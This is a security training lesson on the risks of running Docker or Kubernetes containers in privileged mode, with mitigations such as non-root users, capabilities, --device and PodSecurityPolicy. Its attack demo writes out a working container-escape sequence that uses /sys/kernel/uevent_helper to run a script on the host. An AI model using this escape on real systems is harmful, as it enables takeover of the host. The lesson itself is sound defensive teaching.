Container is running in privileged mode
A user that has root access in a container with Privileged mode on basically is root on the host system
Kubernetes
What is container privileged mode?
By default container runtimes go to great lengths to shield a container from the host system. Running in --privileged
mode disables/bypasses most of these checks. This basically means that if you are root in a container you have the privileges of root on the host system. Is is only meant for special cases such as running Docker in Docker and should be avoided.
About this lesson
In this lesson, we will show you why running containers in privileged mode is really a bad idea. First, we will show you that a privileged container system with root access gives you access to the host filesystem, kernel settings and processes. We will explain alternative configuration options if you need more access then usual. Finally, we will teach you how to configure your Kubernetes code to disable running containers with such settings.
We know it's tempting but privileged mode in almost all cases is a matter of lazyness. Let's see why using it is a bad idea!
What can you do if you have access to a privileged container
After some careful crafting of a URL request, we manage to get access to a root shell on a remote system (how that's done, I'll leave that for another lesson). We get really excited and start to explore what we can do.
After we get access, we first check if we are inside of a container. Copy and paste the following command into the terminal and hit enter:
cat /proc/1/cgroup
We see the word docker in there so we can confirm we are in a container.
Next thing to check is if we are in a privileged container. A good indicator is that we have access to a lot of devices. Copy and paste the following command into the terminal and hit enter:
ls /dev/
It might also be that we have access to disk devices. We can check this by copying and pasting the following command into the terminal and hit enter:
fdisk -l
Now we want to take one step further, we want to execute commands from the host. To achieve this we set up a callback that gets triggered whenever a new device is mounted. The feature is called notification on release and can only be set, because we have the capability CAP_SYS_ADMIN
.
We find out the overlay filesystem path:
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
We install our trigger script that lists all the processes and make it executable.
cat << EOF > /trigger.sh#!/bin/shps auxf > output.txtEOFchmod +x /trigger.sh
Finally, we add our script to the event helper and trigger the change event:
echo "$host_path/trigger.sh" > /sys/kernel/uevent_helperecho change > /sys/class/mem/null/uevent
And lo and behold... output.txt
contains the process list of the host! We can now execute commands on the host system.
To see the output of this, copy and paste the following command into the terminal below:
head output.txt
Privileged mode disables all these checks
It was first introduced as an easier way to debug and to allow for running Docker inside Docker.
Enabling Privileged mode (--privileged
) as per the official Docker documentation has the following effects: the --privileged
flag gives all capabilities to the container, and it also lifts all the limitations enforced by the device cgroup controller. In other words, the container can then do almost everything that the host can do. This flag exists to allow special use-cases, like running Docker within Docker.
You can find more detail in this blogpost about docker in docker by Docker Captain JPetazzo who submitted this feature.
With privileged root in a container means root on host
The result of bypassing all these checks is that a user root inside of a container will have the same access as root on the host system. So we definitely want to avoid running as root in a container that is running in privileged mode.
Avoid running as root user in a container
When a container is given privileged mode it receives all permissions the host has. When running as a regular user this might still be limited, but as root this means having control over the complete host system. Therefore the first mitigation is to avoid running as root in the first place.
root (id = 0) is the default user within a container. The image developer can create additional users. Those users are accessible by name. When passing a numeric ID, the user does not have to exist in the container.
We can set a default user to run the first process with the Dockerfile USER instruction.
But sometimes we don't have control over the image and we download a container image that by default runs as root (for example Ubuntu). When starting a container, we can override the USER instruction by passing the -u (--user
) option.
$ docker run -u 1001 -it ubuntu:latest /bin/bashI have no name!@94f1ded5e4ac:/$ id -auid=1001 gid=0(root) groups=0(root)
We see that this confuses the container as it doesn't see itself as root anymore.
Prevent a user from becoming root user
Even when a container is started as non root, given the right permissions a user might sudo and become root. We can block this behavior by using the --security-opt no-new-privileges
flag when starting the container.
docker container run --rm -it \--user 1001:1001 \--security-opt no-new-privileges \mycontainer
Advanced - Remap container process to a non privileged host user
The user specified on the CLI or in the Dockerfile refer to the user running inside of the container. As a container admin you can change under which users containers run on the host using the userns-remap feature
. This will make it transparent for a container and tricks it into thinking it is still root but in reality it runs as a different user on the host.
The explanation of this is out of scope, see the Docker documentation on using userns-remap.
Advanced - Running Docker Daemon in Rootless mode
Rootless mode executes the Docker daemon and containers inside a user namespace. This is very similar to userns-remap mode
, except that with userns-remap mode
, the daemon itself is running with root privileges, whereas in rootless mode, both the daemon and the container are running without root privileges.
The explanation of this is out of scope, see the docker documentation for more information on running Docker in rootless mode.
Take some time and find the privileges you actually need
It's really tempting to give a container privileged mode, this takes away the pain of having to find out the real privileges you need. It's the chmod 777
of containers. As we've shown in the In Action section, this is really a bad idea. We encourage you to look at the documentation of the container to what privileges it really needs.
In the next parts we describe a few of the most common cases where we see people resort to privileged mode but could have specified specific permission so privileged mode is not required. You can check all the options for the docker runtime on their documentation page.
Use --device to shared device access from host to container
When dealing with device access from host inside of a container it's tempting to add privileged mode, yet there is a better solution: To share devices from the host to the container such as disks or serial ports there exist a specific container run flag --device
.
$ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc
Use capabilities to allow listening to port below 1024
Another common case is when you want to start a webserver and is says it can't bind to a lower tcp port (say port 80 port http). If a server needs to listen to a port below 1024 , we can use Linux capabilities to add this capability.
Your error might look like:
(13)Permission denied: AH00072: make_sock: could not bind to address [::]:80
Then you can add the capability NET_BIND_SERVICE
to the container instead of adding the privileged mode.
$ docker run -it --rm --cap-drop=ALL --cap-add=NET_BIND_SERVICE php:apache
For more information on using Linux Capabilities see our other lesson about configuring Container and Linux Capabilities.
Please note that the bind behavior has changed in Docker since version 20.03 to allow lower port binding. So if you see this error best to check/upgrade the container runtime version.
Seccomp - filesystem permission frustration
Trust us , we've been there seccomp is not always easy. Sometimes you think you've set up all the permission you think it needs but there is still some permission issue. You can relax the seccomp contraints while mounting filesystems. More specific volume mount option besides the ro/rw flag also support a -z
and -Z
flag to relax seccomp file permissions. Matt Jarvis has written a more detailed blog on privileged mode and seccomp.
Seccomp outdated - raspberry pi/alpine
There is a known issue with older versions of seccomp and newer versions of the docker runtime on Alpine systems/Raspbian. This manifest itself, for example, by not being able to run apt update
as root in a container. The solution is to update libseccomp to a new version; sometimes this is not available on your OS updates so you have to update manually. See https://docs.linuxserver.io/faq for more details.
Even developers of the popular Home Assistant automation package added --privileged
in the documentation as a recommended way to run their container. As described in this issue https://github.com/home-assistant/core/issues/52647 it shows it was not really needed.
Enforcing Kubernetes securityContext capability settings
As a Kubernetes admin, you can configure the cluster to enforce securityContext settings. Kubernetes has the PodSecurityPolicy controller built in which allows you to enforce securityContext settings.
More specifically you can force that users (a) not use privileged, (b) must run as non root and (c) disables any escalation of privilege happening in a container.
- privileged: determines if any container in a pod can enable privileged mode. By default a container is not allowed to access any devices on the host, but a "privileged" container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. This is useful for containers that want to use linux capabilities like manipulating the network stack and accessing devices.
- MustRunAsNonRoot: Requires that the pod be submitted with a non-zero runAsUser or have the USER directive defined (using a numeric UID) in the image. Pods which have specified neither runAsNonRoot nor runAsUser settings will be mutated to set runAsNonRoot=true, thus requiring a defined non-zero numeric USER directive in the container. No default provided. Setting allowPrivilegeEscalation=false is strongly recommended with this strategy.
- AllowPrivilegeEscalation: Gates whether or not a user is allowed to set the security context of a container to allowPrivilegeEscalation=true. This defaults to allowed so as to not break setuid binaries. Setting it to false ensures that no child process of a container can gain more privileges than its parent.
See Kubernetes documentation for more info .
Please note that PodSecurityPolicy has been deprecated in the v1.21 release and is scheduled for removal in v1.25.
It will eventually be replaced by the new Pod Security Admission feature; however, as of v1.22, it is still in alpha status. Good alternatives are the externally maintained projects Open Policy Agent or Kyverno.
Test your knowledge!
Keep learning
To learn more about kubernetes security, check out our blog posts:
- $fun & $profit - In the example attack we've shown how we got access to the host filesystems and execute processes on the host system, all while inside the privileged container. For different kinds of attack vectors you can read more about Container Breakouts. Also honourable mention of _fel1x for capturing an attack code in a single tweet
- Learn more about Kubernetes Security issues and best practices
- Check out our article on the top 10 Kubernetes Security Context settings you should understand on our blog.